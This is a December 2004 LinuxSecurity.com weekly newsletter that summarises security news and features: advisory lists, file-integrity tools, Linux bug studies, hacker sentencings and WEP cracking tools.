This week, perhaps the most interesting articles include "," "SAML: The Secret to Centralized Identity Management," and Students Uncover Dozens of Unix Software Flaws."

Internet Productivity Suite: Open Source Security - Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design. Click to find out more!
LINUX ADVISORY WATCH - This week, advisories were released for hpsockd, viewvcs, nfs-util, cyrus-imapd, netatalk, gaim, rhpl, ttfonts, mc, udev, gnome-bluetooth, rsh, mysql, libpng, glib, gtk, postgresql, shadow-utils, perl, mirrorselect, drakxtools, dietlib, gzip, rp-ppoe, openssl, ImageMagick, samba, and cups. The distributors include Debian, Fedora, Gentoo, Mandrake, Red Hat, SuSE, Trustix, and Turbo Linux.

LinuxSecurity.com Feature Extras:

Vincenzo Ciaglia Speaks Security 2004 - Vincenzo Ciaglia of Linux Netwosix talks about this year of Linux Security. A full immersion in the world of Linux Security from many sides and points of view.

Mass deploying Osiris - Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel.

AIDE and CHKROOTKIT -Network security is continuing to be a big problem for companies and home users. The problem can be resolved with an accurate security analysis. In this article I show how to approach security using aide and chkrootkit.

Bulletproof Virus Protection - Protect your network from costly security breaches with Guardian Digital’s multi-faceted security applications. More then just an email firewall, on demand and scheduled scanning detects and disinfects viruses found on the network. Click to find out more!

Take advantage of our Linux Security discussion list! This mailing list is for general security-related questions and comments. To subscribe send an e-mail to This email address is being protected from spambots. You need JavaScript enabled to view it. with "subscribe" as the subject.

Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headline.

Zero Viruses In 2005?
17th, December, 2004

'Tis the season for some holiday cheer. It's also the time of year to reflect on the good security choices you've made over the year, the defense-in-depth strategy that you've decided to follow, and still be able to go home at night and have time for your wife and children.
Linux has fewer bugs, analysis shows
14th, December, 2004

Linux has fewer bugs than typical commercial software, says testing tools vendor Coverity. The company says the 2.6 Linux kernel has one bug for every 5,787 lines of code, compared to the commercial software norm of one bug per 40 lines. Coverity markets source code analysis software, including a product called SWAT that "simulates the effects that the operations in the source code might have" in runtime environments. The company says this approach finds more potentially disastrous bugs than competing code analysis tools that simply scan for known, dangerous coding patterns and sloppy coding constructs.
PGP Corporation Co-Sponsors HIPAA Educational Series
14th, December, 2004

"There is no single solution to the complex issues of security compliance under the HIPAA regulations," noted Dr. Braithwaite. "But there are certain best practices that every organization should follow. Employing encryption technologies in situations where the risk of a security breach is significant is an important core component of these solutions."

news/organizations-events/pgp-corporation-co-sponsors-hipaa-educational-series
Kenai Systems Focuses on Web Services Vulnerabilities With Release Of Two Products
16th, December, 2004

Kenai Systems Inc., a maker of Web services vulnerability tools, today announced the release of two products: eXamine, and eXamineST. The products enable developers to import WSDL files and test them for Web services security vulnerabilities.

news/vendors-products/kenai-systems-focuses-on-web-services-vulnerabilities-with-release-of-two-products
Security research suggests Linux has fewer flaws
14th, December, 2004

The Linux operating system has many times fewer bugs than typical commercial software, according to an upcoming report. The conclusion is the result of a four-year research project conducted by code-analysis company Coverity, which plans to release its report on Tuesday. The project found 985 bugs in the 5.7 million lines of code that make up the latest version of the Linux core operating system, or kernel. A typical commercial program of similar size usually has more than 5,000 flaws or defects, according to data from Carnegie Mellon University.
Linux, Security Certifications Gain Popularity
14th, December, 2004

CertCities.com, a leading Web site for IT certifications, this week unveiled its annual predictions for 2005's hottest certifications. To no one's surprise, Cisco's high-level CCIE (Cisco Certified Internetwork Expert) garnered the most interest from IT certification seekers for 2005. Microsoft's MCSE (Microsoft Certified Systems Engineer) with a sub-specialization in security came in a close second.
Study: Linux the Safest Out There
15th, December, 2004

A new study has found that Linux is more secure than most commercial software -- results that echo what its proponents have long said.

Fashion-Technology Fusion Threatens Security
15th, December, 2004

Employers need thoughtful policies to control which fashionable personal tech items they'll allow on the premises.

Bali bomber writes How-To
16th, December, 2004

But tucked into the back of the 280-page book is a chapter of an entirely different cast, titled "Hacking, Why Not?" There, Samudra urges fellow Muslim radicals to take the holy war into cyberspace by attacking U.S. computers, with the particular aim of committing credit card fraud, called "carding." The chapter provides an outline on getting started.
SAML: The Secret to Centralized Identity Management
17th, December, 2004

Complicated by too many systems, too many applications, and too many passwords, identity management is a major headache for most organizations. Can an intelligent, Web-services approach employing new standards ride to the rescue?

news/privacy/saml-the-secret-to-centralized-identity-management
DirecTV hacker sentenced to seven years
13th, December, 2004

A Canadian man was sentenced to seven years in a U.S. prison this week after admitting he led a sophisticated satellite TV piracy ring that produced and sold thousands of hacked smart cards in the U.S. and Canada.

news/government/directv-hacker-sentenced-to-seven-years
Cyber-Security Office Calls for More Clout
15th, December, 2004

The office in charge of cyber-security in the Department of Homeland Security is planning to continue moving ahead on the agenda the agency has already set.

news/government/cyber-security-office-calls-for-more-clout
Feds Failing To Protect Against Cybersecurity Threats
16th, December, 2004

Attention to cybersecurity has gone from one extreme to the other. Soon after 9/11, the news media was filled with shrieking and arm-waving about "cyberterrorism." Eventually, sensible people ralized that the notion of cyberterrorism is just plain silly. Terrorists are interested in being terrifying, they want to set off bombs and send bodies flying and blood flowing.

news/government/feds-failing-to-protect-against-cybersecurity-threats
DHS cyber security lagging
17th, December, 2004

The U.S. Department of Homeland Security is having some homeland cyber security issues on its systems providing remote access to telecommuters, according to a newly-released report by the DHS Inspector General's office.

news/government/dhs-cyber-security-lagging
Students uncover dozens of Unix software flaws
16th, December, 2004

Students of iconoclastic computer scientist Daniel Bernstein have found some 44 security flaws in various Unix applications, according to a list of advisories posted online. The flaws, which range from minor slipups in rarely used applications to more serious vulnerabilities in software that ships with most versions of the Linux operating system, were found as part of Bernstein's graduate level course at the University of Illinois at Chicago.

news/hackscracks/students-uncover-dozens-of-unix-software-flaws
Securing Wireless E-Records
13th, December, 2004

Few understand how tough it can be to lock down wireless networks better than Stephen Lewack, director of technical services and communications at Columbus Regional Healthcare System. Lewack is protecting a growing number of wireless devices throughout the Georgia hospital, which includes more than 400 in-patient beds, more than 200 long-term care beds, and a pharmacy.

WEP: Dead Again, Part 1
15th, December, 2004

This article is the first of a two-part series that looks at the new generation of WEP cracking tools for WiFi networks, which offer dramatically faster speeds for penetration testers over the previous generation of tools. In many cases, a WEP key can be determined in seconds or minutes. Part one, below, compares the latest KoreK based tools that perform passive statistical analysis and brute-force cracking on a sample of collected WEP traffic. Next time, in part two, we'll look at active attack vectors, including a method to dramatically increase the rate of packet collection to make statistical attacks even more potent.

Wi-Fi Hacker Sentenced To Nine Years
17th, December, 2004

A 21-year-old Michigan man was sentenced Wednesday to nine years in prison for breaking into the network of home improvement retailer Lowe's, the longest jail term ever handed out in the U.S. for hacking.